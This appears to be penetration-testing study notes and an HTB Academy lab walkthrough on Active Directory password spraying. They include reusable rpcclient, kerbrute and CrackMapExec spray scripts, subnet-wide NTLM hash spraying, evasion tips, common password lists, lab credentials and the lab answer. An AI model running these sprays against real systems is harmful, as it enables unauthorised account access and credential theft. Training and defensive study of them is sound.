Password Spraying from Linux
Overview
Password spraying is one of the most effective methods for gaining initial domain credentials in Active Directory environments. This technique involves testing a small number of common passwords against a large list of usernames, staying below account lockout thresholds while maximizing the chance of success.
Attack Methodology
Critical Prerequisites
Password Policy Knowledge: Essential for safe execution
Valid User List: Accurate username enumeration completed
Lockout Threshold: Must stay below the limit (typically 3-5 attempts)
Attack Timing: Space attempts based on lockout duration
Attack Flow
User List Preparation: Clean, validated username list
Password Selection: Common, policy-compliant passwords
Attack Execution: Systematic credential testing
Success Validation: Verify discovered credentials
Documentation: Log all activities and results
rpcclient Password Spraying
Basic Methodology
Success Indicator: "Authority Name" in the response
Bash One-Liner: Efficient automation approach
Filtering: Grep for successful authentications only
Single Password Spray

```bash
# Basic rpcclient password spray
for u in $(cat valid_users.txt); do
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority
done
```

Example Successful Output

```text
Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHT
```

Enhanced Script with Logging
```bash
#!/bin/bash
# Enhanced password spraying with logging
DC_IP="172.16.5.5"
USERLIST="valid_users.txt"
PASSWORD="Welcome1"
LOGFILE="spray_results_$(date +%Y%m%d_%H%M%S).log"

echo "[$(date)] Starting password spray against $DC_IP" | tee -a "$LOGFILE"
echo "[$(date)] Testing password: $PASSWORD" | tee -a "$LOGFILE"

for user in $(cat "$USERLIST"); do
    echo "[$(date)] Testing user: $user" >> "$LOGFILE"
    result=$(rpcclient -U "$user%$PASSWORD" -c "getusername;quit" "$DC_IP" 2>/dev/null)
    if echo "$result" | grep -q "Authority"; then
        echo "[SUCCESS] $user:$PASSWORD" | tee -a "$LOGFILE"
        echo "$result" >> "$LOGFILE"
    fi
done

echo "[$(date)] Password spray completed" | tee -a "$LOGFILE"
```

Kerbrute Password Spraying
Key Advantages
Speed: Fastest password spraying method
Stealth: Minimal event generation
Kerberos-Based: Uses native authentication protocol
Clear Output: Easy to identify successful logins
Basic Kerbrute Spraying

```bash
# Single password spray
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
# Save results to file
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 -o spray_results.txt
# Verbose output
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 -v
```

Example Kerbrute Output
```text
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop

2022/02/17 22:57:12 >  Using KDC(s):
2022/02/17 22:57:12 >   172.16.5.5:88

2022/02/17 22:57:12 >  [+] VALID LOGIN:  sgage@inlanefreight.local:Welcome1
2022/02/17 22:57:12 >  Done! Tested 57 logins (1 successes) in 0.172 seconds
```

Multiple Password Spraying
```bash
#!/bin/bash
# Multiple password spray with delays
PASSWORDS=("Welcome1" "Password1" "Company123" "Spring2024")
USERLIST="valid_users.txt"
DOMAIN="inlanefreight.local"
DC="172.16.5.5"
DELAY=35 # Minutes between sprays (based on lockout policy)

for password in "${PASSWORDS[@]}"; do
    echo "[$(date)] Testing password: $password"
    kerbrute passwordspray -d "$DOMAIN" --dc "$DC" "$USERLIST" "$password" -o "spray_$password.txt"
    # Check for successful logins
    if grep -q "VALID LOGIN" "spray_$password.txt"; then
        echo "[SUCCESS] Found valid credentials with password: $password"
        grep "VALID LOGIN" "spray_$password.txt"
    fi
    # Wait between attempts (except for last password)
    if [ "$password" != "${PASSWORDS[-1]}" ]; then
        echo "[$(date)] Waiting $DELAY minutes before next spray..."
        sleep "${DELAY}m"
    fi
done
```

CrackMapExec Password Spraying
Key Features
SMB-Based: Uses SMB protocol for authentication
Bulk Testing: Efficient user list processing
Success Filtering: Easy identification of valid credentials
Immediate Validation: Built-in credential verification
Basic CrackMapExec Spraying

```bash
# Single password against user list
crackmapexec smb 172.16.5.5 -u valid_users.txt -p Welcome1 | grep +
# Multiple passwords (one at a time)
crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
```

Example Successful Output

```text
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\avazquez:Password123
```

Credential Validation

```bash
# Validate discovered credentials
crackmapexec smb 172.16.5.5 -u avazquez -p Password123
# Expected output:
# SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
# SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\avazquez:Password123
```

Advanced CrackMapExec Script
```bash
#!/bin/bash
# Advanced CrackMapExec spraying with comprehensive logging
DC_IP="172.16.5.5"
USERLIST="valid_users.txt"
PASSWORDS=("Welcome1" "Password123" "Company2024")
LOGFILE="cme_spray_$(date +%Y%m%d_%H%M%S).log"

echo "[$(date)] Starting CrackMapExec password spray" | tee -a "$LOGFILE"
echo "[$(date)] Target: $DC_IP" | tee -a "$LOGFILE"
echo "[$(date)] User list: $USERLIST ($(wc -l < "$USERLIST") users)" | tee -a "$LOGFILE"

for password in "${PASSWORDS[@]}"; do
    echo "[$(date)] Testing password: $password" | tee -a "$LOGFILE"
    # Run spray and capture results
    result=$(crackmapexec smb "$DC_IP" -u "$USERLIST" -p "$password" 2>&1)
    # Log full results
    echo "$result" >> "$LOGFILE"
    # Extract and display successes
    successes=$(echo "$result" | grep '\[+\]')
    if [ -n "$successes" ]; then
        echo "[SUCCESS] Found valid credentials:" | tee -a "$LOGFILE"
        echo "$successes" | tee -a "$LOGFILE"
        # Validate each successful credential
        echo "$successes" | while read -r line; do
            # Pull the username out of "[+] DOMAIN\user:password" (one backslash in the output)
            user=$(echo "$line" | grep -oP '\[\+\] [^\\]+\\\K[^: ]+')
            echo "[$(date)] Validating $user:$password" | tee -a "$LOGFILE"
            crackmapexec smb "$DC_IP" -u "$user" -p "$password" | tee -a "$LOGFILE"
        done
    fi
    echo "[$(date)] Completed testing password: $password" | tee -a "$LOGFILE"
    echo "----------------------------------------" | tee -a "$LOGFILE"
done
```

Local Administrator Password Reuse
Attack Concept
Local administrator accounts often have the same password across multiple systems due to:
Gold Images: Automated deployments using templates
Management Ease: Admins using same password everywhere
Legacy Practices: Old password policies still in effect
Target Prioritization
High-Value Servers: SQL, Exchange, file servers
Domain Controllers: If accessible (high impact)
Management Systems: SCCM, monitoring tools
Jump Boxes: Administrative workstations
Hash-Based Spraying

```bash
# Local admin hash spraying across subnet
crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
```

Example Output:

```text
SMB 172.16.5.50  445 ACADEMY-EA-MX01 [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.25  445 ACADEMY-EA-MS01 [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.125 445 ACADEMY-EA-WEB0 [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
```

Comprehensive Local Admin Hunting
```bash
#!/bin/bash
# Hunt for local admin password reuse
HASH="88ad09182de639ccc6579eb0849751cf"
SUBNETS=("172.16.5.0/24" "172.16.4.0/24" "10.10.10.0/24")
ACCOUNTS=("administrator" "admin" "localadmin")

for subnet in "${SUBNETS[@]}"; do
    echo "[$(date)] Testing subnet: $subnet"
    for account in "${ACCOUNTS[@]}"; do
        echo "[$(date)] Testing account: $account"
        crackmapexec smb --local-auth "$subnet" -u "$account" -H "$HASH" --threads 50 | grep '\[+\]' | tee -a "local_admin_reuse.log"
    done
done
```

Important Flags
--local-auth: Prevents domain account lockouts
--threads: Controls connection speed
-H: Uses NTLM hash instead of password
HTB Academy Lab Walkthrough
Lab Question
"Find the user account starting with the letter 's' that has the password Welcome1. Submit the username as your answer."
Step-by-Step Solution
Step 1: Connect to Attack Host

```bash
# SSH to target
ssh htb-student@10.129.54.201
# Password: HTB_@cademy_stdnt!
```

Step 2: Gather User List with enum4linux
```bash
# Use enum4linux to gather usernames (exact HTB lab method)
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" > validUsers.txt
# Verify the user list was created
cat validUsers.txt
wc -l validUsers.txt
# Alternative: If you have Kerbrute results from previous enumeration
# grep -oP 'VALID USERNAME:\s*\K[^@]+' kerbrute_output.txt > valid_users.txt
```

Step 3: Method 1: rpcclient Password Spray
```bash
# Test Welcome1 password against all users
for u in $(cat validUsers.txt); do
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority
done
```

Step 4: Method 2: Kerbrute Password Spray (Recommended)
```bash
# Most reliable method - exactly as shown in HTB lab
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validUsers.txt Welcome1
```

Step 5: Method 3: CrackMapExec
```bash
# Alternative verification
crackmapexec smb 172.16.5.5 -u validUsers.txt -p Welcome1 | grep +
```

Step 6: Expected Results
Based on the lab content, you should see:
enum4linux output (userlist creation):
```text
# validUsers.txt should contain usernames like:
administrator
guest
krbtgt
lab_adm
htb-student
sgage
avazquez
...
```

Password spraying results:
```text
# rpcclient output:
Account Name: sgage, Authority Name: INLANEFREIGHT

# Kerbrute output (exactly from HTB lab):
[!] lab_adm@inlanefreight.local:Welcome1 - KDC_Error: KDC has no support for encryption type
[+] VALID LOGIN: sgage@inlanefreight.local:Welcome1
Done! Tested 21 logins (1 successes) in 0.061 seconds

# CrackMapExec output:
[+] INLANEFREIGHT.LOCAL\sgage:Welcome1
```

Answer: sgage
Step 7: Verification
```bash
# Verify the discovered credentials
crackmapexec smb 172.16.5.5 -u sgage -p Welcome1
# Should show successful authentication
```

Tool Comparison
| Tool | Speed | Stealth | Accuracy | Features | Best Use Case |
|---|---|---|---|---|---|
| rpcclient | Medium | Medium | High | Simple, reliable | Script automation |
| Kerbrute | Fast | High | High | Kerberos-based, minimal logs | Large-scale spraying |
| CrackMapExec | Medium | Low | High | Validation, local auth | Comprehensive testing |
Security Considerations
Event Generation
| Tool | Event IDs Generated | Detection Risk |
|---|---|---|
| rpcclient | 4625 (failures), 4624 (success) | Medium |
| Kerbrute | 4768 (TGT requests), 4771 (Pre-auth failed) | Low |
| CrackMapExec | 4625 (failures), 4624 (success), 4648 (explicit logon) | High |
Defense Evasion
Timing: Space attempts based on lockout policy
User Selection: Avoid high-privilege accounts initially
Password Selection: Use policy-compliant passwords
Monitoring: Watch for defensive responses
Detection Indicators
Multiple authentication failures from single source
Sequential login attempts across user list
Unusual authentication timing (outside business hours)
High volume of Event ID 4625 in short timeframe
Password Selection Strategy
Common Effective Passwords
```text
# Season + Year + Complexity
Spring2024!
Summer2024!
Fall2024!
Winter2024!

# Company + Variations
CompanyName1
CompanyName123
CompanyName2024!

# Standard Weak Passwords
Welcome1
Password1
Password123
Admin123
```

Password Policy Compliance
```text
# For 8-character minimum, complexity enabled:
- Minimum 8 characters
- 3 out of 4 character types:
  - Uppercase letter
  - Lowercase letter
  - Number
  - Special character

# Examples that meet typical policy:
Welcome1   # W (upper) + elcome (lower) + 1 (number)   = 3/4 types, compliant
Password1  # P (upper) + assword (lower) + 1 (number)  = 3/4 types, compliant
Company!   # C (upper) + ompany (lower) + ! (special)  = 3/4 types, compliant
```

Attack Documentation Template
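The 3-of-4 rule above is why Welcome1 and Password1 pass a default AD policy. As an added example (not from the original notes), the following Python implements that check and pairs it with the control that actually rejects such candidates: a banned-base-word filter of the kind that backs a banned-password list. The banned words and the company name are constructed for illustration; the normalisation (lower-case, strip digits and punctuation from either end) is an assumption chosen so that Welcome1, Password123, Spring2024! and CompanyName2024! all collapse to the word they are built on.

```python
"""Complexity check plus banned-base-word filter (added example)."""
import re

# Base words behind the common spray candidates listed in the notes (constructed list).
BANNED_WORDS = {
    "welcome", "password", "admin", "company", "companyname",
    "spring", "summer", "fall", "autumn", "winter",
}


def char_classes(password):
    """Return the set of character classes present: upper, lower, digit, special."""
    classes = set()
    for ch in password:
        if ch.isupper():
            classes.add("upper")
        elif ch.islower():
            classes.add("lower")
        elif ch.isdigit():
            classes.add("digit")
        else:
            classes.add("special")
    return classes


def meets_complexity(password, min_length=8, min_classes=3):
    """The typical AD rule: at least min_length characters and 3 of 4 classes."""
    return len(password) >= min_length and len(char_classes(password)) >= min_classes


def banned_pattern(password, company=None):
    """Return the banned base word the password is built on, or None.

    Lower-cases the candidate and strips any run of non-letters from the
    start and end, so trailing years, digits and punctuation disappear.
    """
    words = set(BANNED_WORDS)
    if company:
        words.add(company.lower())
    core = re.sub(r"^[^a-z]+|[^a-z]+$", "", password.lower())
    return core if core in words else None


def evaluate(password, company=None):
    """Combine both checks the way a password filter would, returning the reasons."""
    result = {
        "password": password,
        "classes": sorted(char_classes(password)),
        "complexity_ok": meets_complexity(password),
        "banned_word": banned_pattern(password, company),
    }
    result["accepted"] = result["complexity_ok"] and result["banned_word"] is None
    return result


if __name__ == "__main__":
    # The three examples from the notes plus a company-themed variant (constructed).
    for candidate in ("Welcome1", "Password1", "Company!", "Inlanefreight2024!", "Xq7!mRb2pL"):
        r = evaluate(candidate, company="inlanefreight")
        verdict = "accepted" if r["accepted"] else f"rejected ({'banned word: ' + r['banned_word'] if r['banned_word'] else 'complexity'})"
        print(f"{candidate:20s} classes={len(r['classes'])}/4  {verdict}")
```

All three of the notes' examples come back `complexity_ok` but `accepted: False`, which is the point: length and class counting cannot tell a predictable word-plus-digit from a random string, so a complexity-only policy is what makes a one-password-per-user spray viable.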
Spray Session Log

```text
Date: 2024-01-15
Time: 14:30:00 UTC
Method: Kerbrute Password Spray
Target DC: 172.16.5.5
Domain: inlanefreight.local
User List: valid_users.txt (57 users)
Password Tested: Welcome1
Results: 1 success (sgage:Welcome1)
Duration: 0.172 seconds
Event Risk: Low (Kerberos-based)
```

Success Tracking
```bash
# Create success log
echo "Username:Password:Method:Timestamp" > successful_logins.log
echo "sgage:Welcome1:Kerbrute:$(date)" >> successful_logins.log

# Validate all successes
while IFS=: read -r user pass method timestamp; do
    if [ "$user" != "Username" ]; then
        echo "Validating $user:$pass"
        crackmapexec smb 172.16.5.5 -u "$user" -p "$pass"
    fi
done < successful_logins.log
```

Quick Reference Commands
One-Liner Sprays

```bash
# enum4linux user enumeration (HTB method)
enum4linux -U DC_IP | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" > validUsers.txt
# rpcclient one-liner
for u in $(cat validUsers.txt); do rpcclient -U "$u%PASSWORD" -c "getusername;quit" DC_IP | grep Authority; done
# Kerbrute spray (most effective)
kerbrute passwordspray -d domain.local --dc DC_IP validUsers.txt PASSWORD
# CrackMapExec spray
crackmapexec smb DC_IP -u validUsers.txt -p PASSWORD | grep +
# Local admin hash spray
crackmapexec smb --local-auth SUBNET -u administrator -H HASH | grep +
```

Result Extraction
```bash
# Extract usernames from successful sprays
# (works with or without the timestamp prefix kerbrute adds to each line)
grep -oP 'VALID LOGIN:\s*\K[^@]+' kerbrute_output.txt
# Extract from CrackMapExec ("[+] DOMAIN\user:password" has a single backslash)
grep '\[+\]' cme_output.txt | grep -oP '\[\+\] [^\\]+\\\K[^: ]+'
# Extract from rpcclient ("Account Name: user, Authority Name: DOMAIN")
grep "Authority Name" rpc_output.txt | awk '{print $3}' | cut -d',' -f1
```

Key Takeaways
Attack Best Practices
Know the Policy: Essential for safe execution
Multiple Tools: Use different methods for verification
Proper Timing: Space attempts to avoid lockouts
Documentation: Log everything for client reporting
Critical Warnings
Never Exceed Lockout Threshold: Typically 3-5 attempts max
Monitor Bad Password Counts: Check account status before spraying
Avoid High-Value Accounts: Don't target admin accounts initially
Space Attempts: Wait lockout duration + buffer between sprays
Post-Success Actions
Immediate Validation: Verify all discovered credentials
Privilege Assessment: Check user permissions and group memberships
Access Expansion: Use credentials for further enumeration
Documentation: Record all findings for reporting
Password spraying success requires patience, methodology, and respect for account lockout policies - one successful credential can open the entire domain.